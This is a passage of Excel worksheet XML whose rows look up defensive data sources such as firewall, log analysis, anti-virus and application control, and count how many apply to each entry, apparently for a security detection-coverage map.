        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F179" s="50"/>
      <c r="G179" s="19"/>
    </row>
    <row r="180" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A180" s="16" t="s">
        <v>295</v>
      </c>
      <c r="B180" s="45" t="str">
        <f>LOOKUP(A180,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C180" s="17">
        <v>0</v>
      </c>
      <c r="D180" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E180" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F180" s="50"/>
      <c r="G180" s="19"/>
    </row>
    <row r="181" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A181" s="16" t="s">
        <v>297</v>
      </c>
      <c r="B181" s="45" t="str">
        <f>LOOKUP(A181,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C181" s="17">
        <v>0</v>
      </c>
      <c r="D181" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E181" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F181" s="50"/>
      <c r="G181" s="19"/>
    </row>
    <row r="182" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A182" s="16" t="s">
        <v>298</v>
      </c>
      <c r="B182" s="45" t="str">
        <f>LOOKUP(A182,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C182" s="17" t="s">
        <v>152</v>
      </c>
      <c r="D182" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E182" s="45">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F182" s="50"/>
      <c r="G182" s="19"/>
    </row>
    <row r="183" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A183" s="16" t="s">
        <v>299</v>
      </c>
      <c r="B183" s="45" t="str">
        <f>LOOKUP(A183,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C183" s="17">
        <v>0</v>
      </c>
      <c r="D183" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E183" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F183" s="50"/>
      <c r="G183" s="19"/>
    </row>
    <row r="184" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A184" s="16" t="s">
        <v>300</v>
      </c>
      <c r="B184" s="45" t="str">
        <f>LOOKUP(A184,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C184" s="17">
        <v>100</v>
      </c>
      <c r="D184" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E184" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F184" s="50"/>
      <c r="G184" s="19"/>
    </row>
    <row r="185" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A185" s="16" t="s">
        <v>301</v>
      </c>
      <c r="B185" s="45" t="str">
        <f>LOOKUP(A185,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C185" s="17">
        <v>0</v>
      </c>
      <c r="D185" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E185" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F185" s="50"/>
      <c r="G185" s="19"/>
    </row>
    <row r="186" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A186" s="16" t="s">
        <v>302</v>
      </c>
      <c r="B186" s="45" t="str">
        <f>LOOKUP(A186,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C186" s="17">
        <v>0</v>
      </c>
      <c r="D186" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E186" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F186" s="50"/>
      <c r="G186" s="19"/>
    </row>
    <row r="187" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A187" s="16" t="s">
        <v>304</v>
      </c>
      <c r="B187" s="45" t="str">
        <f>LOOKUP(A187,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C187" s="17" t="s">
        <v>45</v>
      </c>
      <c r="D187" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E187" s="45">
        <f t="shared" si="6"/>
        <v>4</v>
      </c>
      <c r="F187" s="50"/>
      <c r="G187" s="19"/>
    </row>
    <row r="188" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A188" s="16" t="s">
        <v>305</v>
      </c>
      <c r="B188" s="45" t="str">
        <f>LOOKUP(A188,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C188" s="17">
        <v>0</v>
      </c>
      <c r="D188" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E188" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F188" s="50"/>
      <c r="G188" s="19"/>
    </row>
    <row r="189" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A189" s="16" t="s">
        <v>307</v>
      </c>
      <c r="B189" s="45" t="str">
        <f>LOOKUP(A189,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C189" s="17">
        <v>0</v>
      </c>
      <c r="D189" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E189" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F189" s="50"/>
      <c r="G189" s="19"/>
    </row>
    <row r="190" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A190" s="16" t="s">
        <v>308</v>
      </c>
      <c r="B190" s="45" t="str">
        <f>LOOKUP(A190,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C190" s="17">
        <v>0</v>
      </c>
      <c r="D190" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E190" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F190" s="50"/>
      <c r="G190" s="19"/>
    </row>
    <row r="191" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A191" s="16" t="s">
        <v>310</v>
      </c>
      <c r="B191" s="45" t="str">
        <f>LOOKUP(A191,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C191" s="17">
        <v>0</v>
      </c>
      <c r="D191" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E191" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F191" s="50"/>
      <c r="G191" s="19"/>
    </row>
    <row r="192" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A192" s="16" t="s">
        <v>311</v>
      </c>
      <c r="B192" s="45" t="str">
        <f>LOOKUP(A192,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C192" s="17" t="s">
        <v>126</v>
      </c>
      <c r="D192" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E192" s="45">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F192" s="50"/>
      <c r="G192" s="19"/>
    </row>
    <row r="193" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A193" s="16" t="s">
        <v>313</v>
      </c>
      <c r="B193" s="45" t="str">
        <f>LOOKUP(A193,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C193" s="17">
        <v>0</v>
      </c>
      <c r="D193" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E193" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F193" s="50"/>
      <c r="G193" s="19"/>
    </row>
    <row r="194" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A194" s="16" t="s">
        <v>315</v>
      </c>
      <c r="B194" s="45" t="str">
        <f>LOOKUP(A194,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C194" s="17">
        <v>0</v>
      </c>
      <c r="D194" s="45">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E194" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F194" s="50"/>
      <c r="G194" s="19"/>
    </row>
    <row r="195" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A195" s="16" t="s">
        <v>317</v>
      </c>
      <c r="B195" s="45" t="str">
        <f>LOOKUP(A195,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C195" s="17">
        <v>0</v>
      </c>
      <c r="D195" s="45">
        <f t="shared" ref="D195:D258" si="7">LEN(TRIM(B195))-LEN(SUBSTITUTE(TRIM(B195),",",""))+1</f>
        <v>1</v>
      </c>
      <c r="E195" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F195" s="50"/>
      <c r="G195" s="19"/>
    </row>
    <row r="196" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A196" s="16" t="s">
        <v>318</v>
      </c>
      <c r="B196" s="45" t="str">
        <f>LOOKUP(A196,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C196" s="17">
        <v>0</v>
      </c>
      <c r="D196" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E196" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F196" s="50"/>
      <c r="G196" s="19"/>
    </row>
    <row r="197" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A197" s="16" t="s">
        <v>319</v>
      </c>
      <c r="B197" s="45" t="str">
        <f>LOOKUP(A197,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C197" s="17" t="s">
        <v>55</v>
      </c>
      <c r="D197" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E197" s="45">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F197" s="50"/>
      <c r="G197" s="19"/>
    </row>
    <row r="198" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A198" s="16" t="s">
        <v>321</v>
      </c>
      <c r="B198" s="45" t="str">
        <f>LOOKUP(A198,'REF-DataSources'!A:H)</f>
        <v>Firewall,Host forensic analysis</v>
      </c>
      <c r="C198" s="17" t="s">
        <v>140</v>
      </c>
      <c r="D198" s="45">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E198" s="45">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F198" s="50"/>
      <c r="G198" s="19"/>
    </row>
    <row r="199" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A199" s="16" t="s">
        <v>322</v>
      </c>
      <c r="B199" s="45" t="str">
        <f>LOOKUP(A199,'REF-DataSources'!A:H)</f>
        <v>Firewall,Host forensic analysis</v>
      </c>
      <c r="C199" s="17" t="s">
        <v>67</v>
      </c>
      <c r="D199" s="45">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E199" s="45">
        <f t="shared" si="6"/>
        <v>5</v>
      </c>
      <c r="F199" s="50"/>
      <c r="G199" s="19"/>
    </row>
    <row r="200" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A200" s="16" t="s">
        <v>323</v>
      </c>
      <c r="B200" s="45" t="str">
        <f>LOOKUP(A200,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C200" s="17">
        <v>0</v>
      </c>
      <c r="D200" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E200" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F200" s="50"/>
      <c r="G200" s="19"/>
    </row>
    <row r="201" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A201" s="16" t="s">
        <v>324</v>
      </c>
      <c r="B201" s="45" t="str">
        <f>LOOKUP(A201,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C201" s="17">
        <v>0</v>
      </c>
      <c r="D201" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E201" s="45">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F201" s="50"/>
      <c r="G201" s="19"/>
    </row>
    <row r="202" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A202" s="16" t="s">
        <v>325</v>
      </c>
      <c r="B202" s="45" t="str">
        <f>LOOKUP(A202,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C202" s="17">
        <v>0</v>
      </c>
      <c r="D202" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E202" s="45">
        <f t="shared" ref="E202:E265" si="8">LEN(TRIM(C202))-LEN(SUBSTITUTE(TRIM(C202),";",""))+1</f>
        <v>1</v>
      </c>
      <c r="F202" s="50"/>
      <c r="G202" s="19"/>
    </row>
    <row r="203" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A203" s="16" t="s">
        <v>326</v>
      </c>
      <c r="B203" s="45" t="str">
        <f>LOOKUP(A203,'REF-DataSources'!A:H)</f>
        <v>Static File Analysis,Application control,Application control by file name or path</v>
      </c>
      <c r="C203" s="17" t="s">
        <v>45</v>
      </c>
      <c r="D203" s="45">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E203" s="45">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="F203" s="50"/>
      <c r="G203" s="19"/>
    </row>
    <row r="204" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A204" s="16" t="s">
        <v>327</v>
      </c>
      <c r="B204" s="45" t="str">
        <f>LOOKUP(A204,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C204" s="17">
        <v>0</v>
      </c>
      <c r="D204" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E204" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F204" s="50"/>
      <c r="G204" s="19"/>
    </row>
    <row r="205" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A205" s="16" t="s">
        <v>328</v>
      </c>
      <c r="B205" s="45" t="str">
        <f>LOOKUP(A205,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C205" s="17">
        <v>0</v>
      </c>
      <c r="D205" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E205" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F205" s="50"/>
      <c r="G205" s="19"/>
    </row>
    <row r="206" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A206" s="16" t="s">
        <v>329</v>
      </c>
      <c r="B206" s="45" t="str">
        <f>LOOKUP(A206,'REF-DataSources'!A:H)</f>
        <v>Defensive network service scanning</v>
      </c>
      <c r="C206" s="17">
        <v>100</v>
      </c>
      <c r="D206" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E206" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F206" s="50"/>
      <c r="G206" s="19"/>
    </row>
    <row r="207" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A207" s="16" t="s">
        <v>330</v>
      </c>
      <c r="B207" s="45" t="str">
        <f>LOOKUP(A207,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C207" s="17">
        <v>0</v>
      </c>
      <c r="D207" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E207" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F207" s="50"/>
      <c r="G207" s="19"/>
    </row>
    <row r="208" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A208" s="16" t="s">
        <v>331</v>
      </c>
      <c r="B208" s="45" t="str">
        <f>LOOKUP(A208,'REF-DataSources'!A:H)</f>
        <v>Log analysis</v>
      </c>
      <c r="C208" s="17">
        <v>100</v>
      </c>
      <c r="D208" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E208" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F208" s="50"/>
      <c r="G208" s="19"/>
    </row>
    <row r="209" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A209" s="16" t="s">
        <v>333</v>
      </c>
      <c r="B209" s="45" t="str">
        <f>LOOKUP(A209,'REF-DataSources'!A:H)</f>
        <v>Log analysis</v>
      </c>
      <c r="C209" s="17">
        <v>0</v>
      </c>
      <c r="D209" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E209" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F209" s="50"/>
      <c r="G209" s="19"/>
    </row>
    <row r="210" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A210" s="16" t="s">
        <v>334</v>
      </c>
      <c r="B210" s="45" t="str">
        <f>LOOKUP(A210,'REF-DataSources'!A:H)</f>
        <v>Log analysis</v>
      </c>
      <c r="C210" s="17">
        <v>0</v>
      </c>
      <c r="D210" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E210" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F210" s="50"/>
      <c r="G210" s="19"/>
    </row>
    <row r="211" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A211" s="16" t="s">
        <v>336</v>
      </c>
      <c r="B211" s="45" t="str">
        <f>LOOKUP(A211,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C211" s="17">
        <v>0</v>
      </c>
      <c r="D211" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E211" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F211" s="50"/>
      <c r="G211" s="19"/>
    </row>
    <row r="212" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A212" s="16" t="s">
        <v>337</v>
      </c>
      <c r="B212" s="45" t="str">
        <f>LOOKUP(A212,'REF-DataSources'!A:H)</f>
        <v>Anti-virus,System access controls</v>
      </c>
      <c r="C212" s="17" t="s">
        <v>104</v>
      </c>
      <c r="D212" s="45">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E212" s="45">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="F212" s="50"/>
      <c r="G212" s="19"/>
    </row>
    <row r="213" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A213" s="16" t="s">
        <v>338</v>
      </c>
      <c r="B213" s="45" t="str">
        <f>LOOKUP(A213,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C213" s="17">
        <v>0</v>
      </c>
      <c r="D213" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E213" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F213" s="50"/>
      <c r="G213" s="19"/>
    </row>
    <row r="214" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A214" s="16" t="s">
        <v>339</v>
      </c>
      <c r="B214" s="45" t="str">
        <f>LOOKUP(A214,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C214" s="17">
        <v>0</v>
      </c>
      <c r="D214" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E214" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F214" s="50"/>
      <c r="G214" s="19"/>
    </row>
    <row r="215" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A215" s="16" t="s">
        <v>340</v>
      </c>
      <c r="B215" s="45" t="str">
        <f>LOOKUP(A215,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C215" s="17">
        <v>0</v>
      </c>
      <c r="D215" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E215" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F215" s="50"/>
      <c r="G215" s="19"/>
    </row>
    <row r="216" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A216" s="16" t="s">
        <v>341</v>
      </c>
      <c r="B216" s="45" t="str">
        <f>LOOKUP(A216,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C216" s="17">
        <v>0</v>
      </c>
      <c r="D216" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E216" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F216" s="50"/>
      <c r="G216" s="19"/>
    </row>
    <row r="217" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A217" s="16" t="s">
        <v>342</v>
      </c>
      <c r="B217" s="45" t="str">
        <f>LOOKUP(A217,'REF-DataSources'!A:H)</f>
        <v>Application control,Digital Certificate Validation</v>
      </c>
      <c r="C217" s="17" t="s">
        <v>126</v>
      </c>
      <c r="D217" s="45">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E217" s="45">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="F217" s="50"/>
      <c r="G217" s="19"/>
    </row>
    <row r="218" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A218" s="16" t="s">
        <v>343</v>
      </c>
      <c r="B218" s="45" t="str">
        <f>LOOKUP(A218,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C218" s="17">
        <v>0</v>
      </c>
      <c r="D218" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E218" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F218" s="50"/>
      <c r="G218" s="19"/>
    </row>
    <row r="219" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A219" s="16" t="s">
        <v>344</v>
      </c>
      <c r="B219" s="45" t="str">
        <f>LOOKUP(A219,'REF-DataSources'!A:H)</f>
        <v>Anti-virus,Application control,Digital Certificate Validation</v>
      </c>
      <c r="C219" s="17" t="s">
        <v>126</v>
      </c>
      <c r="D219" s="45">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E219" s="45">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="F219" s="50"/>
      <c r="G219" s="19"/>
    </row>
    <row r="220" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A220" s="16" t="s">
        <v>345</v>
      </c>
      <c r="B220" s="45" t="str">
        <f>LOOKUP(A220,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C220" s="17">
        <v>0</v>
      </c>
      <c r="D220" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E220" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F220" s="50"/>
      <c r="G220" s="19"/>
    </row>
    <row r="221" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A221" s="16" t="s">
        <v>346</v>
      </c>
      <c r="B221" s="45" t="str">
        <f>LOOKUP(A221,'REF-DataSources'!A:H)</f>
        <v>Anti-virus,Application control,Digital Certificate Validation</v>
      </c>
      <c r="C221" s="17" t="s">
        <v>405</v>
      </c>
      <c r="D221" s="45">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E221" s="45">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F221" s="50"/>
      <c r="G221" s="19"/>
    </row>
    <row r="222" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A222" s="16" t="s">
        <v>347</v>
      </c>
      <c r="B222" s="45" t="str">
        <f>LOOKUP(A222,'REF-DataSources'!A:H)</f>
        <v>Static File Analysis</v>
      </c>
      <c r="C222" s="17">
        <v>100</v>
      </c>
      <c r="D222" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E222" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F222" s="50"/>
      <c r="G222" s="19"/>
    </row>
    <row r="223" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A223" s="16" t="s">
        <v>348</v>
      </c>
      <c r="B223" s="45" t="str">
        <f>LOOKUP(A223,'REF-DataSources'!A:H)</f>
        <v>File system access controls</v>
      </c>
      <c r="C223" s="17">
        <v>100</v>
      </c>
      <c r="D223" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E223" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F223" s="50"/>
      <c r="G223" s="19"/>
    </row>
    <row r="224" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A224" s="16" t="s">
        <v>349</v>
      </c>
      <c r="B224" s="45" t="str">
        <f>LOOKUP(A224,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C224" s="17">
        <v>100</v>
      </c>
      <c r="D224" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E224" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F224" s="50"/>
      <c r="G224" s="19"/>
    </row>
    <row r="225" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A225" s="16" t="s">
        <v>350</v>
      </c>
      <c r="B225" s="45" t="str">
        <f>LOOKUP(A225,'REF-DataSources'!A:H)</f>
        <v>Anti-virus,Host forensic analysis,Signature-based detection,Static file analysis</v>
      </c>
      <c r="C225" s="17" t="s">
        <v>45</v>
      </c>
      <c r="D225" s="45">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E225" s="45">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="F225" s="50"/>
      <c r="G225" s="19"/>
    </row>
    <row r="226" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A226" s="16" t="s">
        <v>351</v>
      </c>
      <c r="B226" s="45" t="str">
        <f>LOOKUP(A226,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C226" s="17">
        <v>0</v>
      </c>
      <c r="D226" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E226" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F226" s="50"/>
      <c r="G226" s="19"/>
    </row>
    <row r="227" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A227" s="16" t="s">
        <v>353</v>
      </c>
      <c r="B227" s="45" t="str">
        <f>LOOKUP(A227,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C227" s="17">
        <v>0</v>
      </c>
      <c r="D227" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E227" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F227" s="50"/>
      <c r="G227" s="19"/>
    </row>
    <row r="228" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A228" s="16" t="s">
        <v>355</v>
      </c>
      <c r="B228" s="45" t="str">
        <f>LOOKUP(A228,'REF-DataSources'!A:H)</f>
        <v>System access controls,File system access controls</v>
      </c>
      <c r="C228" s="17" t="s">
        <v>259</v>
      </c>
      <c r="D228" s="45">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E228" s="45">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="F228" s="50"/>
      <c r="G228" s="19"/>
    </row>
    <row r="229" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A229" s="16" t="s">
        <v>356</v>
      </c>
      <c r="B229" s="45" t="str">
        <f>LOOKUP(A229,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C229" s="17">
        <v>0</v>
      </c>
      <c r="D229" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E229" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F229" s="50"/>
      <c r="G229" s="19"/>
    </row>
    <row r="230" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A230" s="16" t="s">
        <v>357</v>
      </c>
      <c r="B230" s="45" t="str">
        <f>LOOKUP(A230,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C230" s="17">
        <v>0</v>
      </c>
      <c r="D230" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E230" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F230" s="50"/>
      <c r="G230" s="19"/>
    </row>
    <row r="231" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A231" s="16" t="s">
        <v>359</v>
      </c>
      <c r="B231" s="45" t="str">
        <f>LOOKUP(A231,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C231" s="17">
        <v>0</v>
      </c>
      <c r="D231" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E231" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F231" s="50"/>
      <c r="G231" s="19"/>
    </row>
    <row r="232" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A232" s="16" t="s">
        <v>360</v>
      </c>
      <c r="B232" s="45" t="str">
        <f>LOOKUP(A232,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C232" s="17">
        <v>0</v>
      </c>
      <c r="D232" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E232" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F232" s="50"/>
      <c r="G232" s="19"/>
    </row>
    <row r="233" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A233" s="16" t="s">
        <v>361</v>
      </c>
      <c r="B233" s="45" t="str">
        <f>LOOKUP(A233,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C233" s="17">
        <v>0</v>
      </c>
      <c r="D233" s="45">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E233" s="45">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F233" s="50"/>
      <c r="G233" s="19"/>
    </row>
    <row r="234" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A234" s="16" t="s">
        <v>362</v>
      </c>
      <c r="B234" s="45" t="str">
        <f>LOOKUP(A234,'REF-DataSources'!A:H)</f>
        <v/>
      </c>
      <c r="C234" s="17">
        <v>0</v>
